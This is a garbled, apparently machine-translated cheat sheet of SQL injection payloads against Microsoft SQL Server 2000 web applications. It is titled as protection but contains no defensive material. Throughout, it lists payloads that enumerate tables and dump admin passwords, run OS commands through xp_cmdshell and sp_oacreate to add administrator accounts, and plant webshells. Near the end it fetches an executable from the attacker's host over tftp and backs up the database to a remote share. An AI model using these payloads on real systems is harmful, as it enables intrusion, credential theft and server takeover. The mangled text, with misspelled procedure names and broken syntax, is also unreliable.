SQL Server 2000 Injection Protection (1)

SQL Server 2000 Injection Protection (1)

SQL Injection originated from 'or '1' = '1

The most important table name:

Select * from sysobjects
Sysobjects ncsysobjects
Sysindexes tsysindexes
Syscolumns
Policypes
Sysusers
Sysdatabases
Sysxlogins
Sysprocesses

The most important user names (the default SQL database exists)

Public
Dbo
Guest (generally forbidden or not authorized)
Db_sercurityadmin
AB _dlladmin

Some default extensions

Xp_regaddmultistring
Xp_regdeletekey
Xp_regdeletevalue
Xp_regenumkeys
Xp_regenumvalues
Xp_regread
Xp_regremovemultistring
Xp_regwrite
Xp_availablemedia drive
Xp_dirtree directory
Xp_enumdsn ODBC connection
Xp_loginconfig server security mode information
Xp_makecab: Create a compressed volume
Xp_ntsec_enumdomains domain Information
Xp_terminate_process terminal process, and a PID is provided.

For example:

Sp_addextendedproc 'xp _ webserver', 'c: \ temp \ xp_foo.dll'
Exec xp_webserver
Sp_dropextendedproc 'xp _ webserver'
Bcp "select * FROM test .. foo" queryout c: \ inetpub \ wwwroot \ runcommand. asp
-C-Slocalhost-Usa-Pfoobar
'Group by users. id having 1 = 1-
'Group by users. id, users. username, users. password, users. privs having 1 = 1-
'; Insert into users values (666, 'attacker', 'foobar', 0 xffff )-

Union select TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME = 'logintable '-
Union select TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME = 'logintable' where COLUMN_NAME not in ('login _ id ')-
Union select TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME = 'logintable' where COLUMN_NAME not in ('login _ id', 'login _ name ')-
Union select TOP 1 login_name FROM logintable-
Union select TOP 1 password FROM logintable where login_name = 'rahul '--

Construct statement: query whether xp_cmdshell exists

'Union select @ version, 1, 1 --
And 1 = (select @ VERSION)
And 'sa '= (select System_user)
'Union select ret, 1, 1 from foo --
'Union select min (username), 1, 1 from users where username> 'a '-
'Union select min (username), 1, 1 from users where username> 'admin '-
'Union select password, 1, 1 from users where username = 'admin '--
And user_name () = 'dbo'
And 0 <> (select user_name ()-
; DECLARE @ shell int exec SP_OAcreate 'wscript. shell ', @ shell output exec SP_OAMETHOD @ shell, 'run', null, 'c: \ WINNT \ system32 \ cmd.exe/C net user swap 5245886/add'
And 1 = (select count (*) FROM master. dbo. sysobjects where
Xtype = 'X' AND name = 'xp _ cmdshell ')
; EXEC master. dbo. sp_addextendedproc 'xp _ mongoshell', 'xp log70. dll'

1 = (% 20 select % 20 count (*) % 20 from % 20master. dbo. sysobjects % 20 where % 20 xtype = 'X' % 20and % 20 name = 'xp _ Your shell ')
And 1 = (select IS_SRVROLEMEMBER ('sysadmin') to determine whether the sa permission is
And 0 <> (select top 1 paths from newtable) -- database Brute Force
And 1 = (select name from master. dbo. sysdatabases where dbid = 7) Get the Database name (from 1 to 5 is the System id, 6 or more can be determined)

Create a virtual directory edisk:

Declare @ o int exec sp_oacreate 'wscript. shell ', @ o out exec sp_oamethod @ o, 'run', NULL, 'cscript.exe c: \ inetpub \ wwwroot \ mkwebdir. vbs-w "Default Web site"-v "e", "e :\"'
Access attributes: (write a webshell together)
Declare @ o int exec sp_oacreate 'wscript. shell ', @ o out exec sp_oamethod @ o, 'run', NULL, 'cscript.exe c: \ inetpub \ wwwroot \ chaccess. vbs-a w3svc/1/ROOT/e + browse'

And 0 <> (select count (*) from master. dbo. sysdatabases where name> 1 and dbid = 6)
Submit dbid =, 9... to get more database names.
And 0 <> (select top 1 name from bbs. dbo. sysobjects where xtype = 'U') brute-force to a table is assumed to be admin

And 0 <> (select top 1 name from bbs. dbo. sysobjects where xtype = 'U' and name not in ('admin') to obtain other tables.
And 0 <> (select count (*) from bbs. dbo. sysobjects where xtype = 'U' and name = 'admin'
And uid> (str (id) the value of the brute-force UID is assumed to be 18779569 uid = id
And 0 <> (select top 1 name from bbs. dbo. syscolumns where id = 18779569) to obtain an admin field, which is assumed to be user_id
And 0 <> (select top 1 name from bbs. dbo. syscolumns where id = 18779569 and name not in
('Id',...) to expose other fields
And 0 <(select user_id from BBS. dbo. admin where username> 1)

The user names can be obtained in sequence to get the password ..... Assume that fields such as user_id username and password exist.

Show. asp? Id =-1 union select 1, 2, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, * from admin
Show. asp? Id =-1 union select 1, 2, 4, 5, 6, 7, 8, *, 9, 10, 11, 12, 13 from admin

(Union statements are popular everywhere, and access is also useful.

Special brute-force database tips: % 5c = '\' or submit/and \ modify % 5

And 0 <> (select count (*) from master. dbo. sysdatabases where name> 1 and dbid = 6)
And 0 <> (select top 1 name from bbs. dbo. sysobjects where xtype = 'U ')
And 0 <> (select top 1 name from bbs. dbo. sysobjects where xtype = 'U' and name not in ('address '))
And 0 <> (select count (*) from bbs. dbo. sysobjects where xtype = 'U' and name = 'admin' and uid> (str (id) determine the id value
And 0 <> (select top 1 name from BBS. dbo. syscolumns where id = 773577794) All fields

_ Blank> http://xx.xx.xx.xx/111.asp? Id = 3400; create table [dbo]. [swap] ([swappass] [char] (255 ));--

_ Blank> http://xx.xx.xx.xx/111.asp? Id = 3400 and (select top 1 swappass from swap) = 1
; Create TABLE newtable (id int IDENTITY (500), paths varchar () Declare @ test varchar (20) exec master .. xp_regread @ rootkey = 'HKEY _ LOCAL_MACHINE ', @ key = 'System \ CurrentControlSet \ Services \ W3SVC \ Parameters \ Virtual Roots \', @ value_name = '/', values = @ test OUTPUT insert into paths (path) values (@ test)

_ Blank> http: // 61.131.96.39/PageShow. asp? TianName = Policy and Regulation & InfoID = {57C4165A-4206-4C0D-A8D2-E70666EE4E08}; use % 20 master; declare % 20 @ s % 20% 20int; exec % 20sp_oacreate % 20 "wscript. shell ", @ s % 20out; exec % 20sp_oamethod % 20 @ s," run ", NULL," cmd.exe % 20/c % 20 ping % 201.1.1.1 ";--

The web path d: \ xxxx is obtained. Next:

_ Blank> http://xx.xx.xx.xx/111.asp? Id = 3400; use ku1 ;--
_ Blank> http://xx.xx.xx.xx/111.asp? Id = 3400; create table cmd (str image );--

The traditional test process with xp_cmdshell:

; Exec master .. xp_mongoshell 'dir'
; Exec master. dbo. sp_addlogin hax ;--
; Exec master. dbo. sp_password null, hax, hax ;--
; Exec master. dbo. sp_addsrvrolemember hax sysadmin ;--
; Exec master. dbo. xp_mongoshell 'net user hax 5258/workstations: */times: all/passwordchg: yes/passwordreq: yes/active: yes/add ';--
; Exec master. dbo. xp_mongoshell 'net localgroup administrators hax/add ';--
Exec master.. xp_servicecontrol 'start', 'schedule'
Exec master .. xp_servicecontrol 'start', 'server'
Http://www.xxx.com/list.asp? Classid = 1; DECLARE @ shell int exec SP_OAcreate 'wscript. shell ', @ shell output exec SP_OAMETHOD @ shell, 'run', null, 'c: \ WINNT \ system32 \ cmd.exe/C net user swap 5258/add'
; DECLARE @ shell int exec SP_OAcreate 'wscript. shell ', @ shell output exec SP_OAMETHOD @ shell, 'run', null, 'c: \ WINNT \ system32 \ cmd.exe/C net localgroup administrators swap/add'

_ Blank> http: // localhost/show. asp? Id = 1'; exec master .. xp_cmdshell 'tftp-I youip get file.exe '-

Declare @ a sysname set @ a = 'xp _ '+ 'your shell' exec @ a' dir c :\'
Declare @ a sysname set @ a = 'xp '+' _ cm '+ 'dshell' exec @ a' dir c :\'
; Declare @ a; set @ a = db_name (); backup database @ a to disk = 'your IP address, your shared directory bak. dat'
If it is restricted, you can.
Select * from openrowset ('sqloledb', 'server'; 'sa'; '', 'select' OK! ''Exec master. dbo. sp_addlogin hax ')